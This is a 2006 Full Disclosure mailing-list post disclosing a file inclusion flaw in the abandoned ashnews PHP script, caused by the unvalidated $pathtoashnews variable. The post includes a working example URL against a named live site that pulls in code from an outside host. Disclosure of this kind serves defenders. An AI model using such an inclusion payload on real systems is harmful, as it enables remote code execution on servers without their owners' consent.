Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: ashnews Cross-Site Scripting Vulnerability

From: DanB-FD <dan-fd () f-box org>
Date: Tue, 31 Jan 2006 10:43:19 +0000
Hi,

Dan B UK wrote:
Due to the nature of the issue I am not disclosing the detail of it until the writer of the software has updated it; maybe you could have waited??
A vulnerability that allows privileges of the apache user within the limitations of how much PHP has been locked down.
Since the author of the product has got back to me with the following I think it is ok to disclose the issue now.
"That is a known error. Unfortunately I have completely abondoned ashnews. In fact, I have been neglecting taking it down completely which I am going to do right now. - Derek"
The issue is in the handling of the $pathtoashnews, it is not validated before being used by the script. Allowing remote or local file inclusion.
eg: http://dosko.nl/news/ashnews.php?pathtoashnews=http://f-box.org/~dan/inc.inc? ( The ? is required to make the remote server (f-box.org) ignore the string that is appended to the variable $pathtoashnews ) 
( The website that is in the example above has already been defaced! )

Cheers,
DanB UK.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: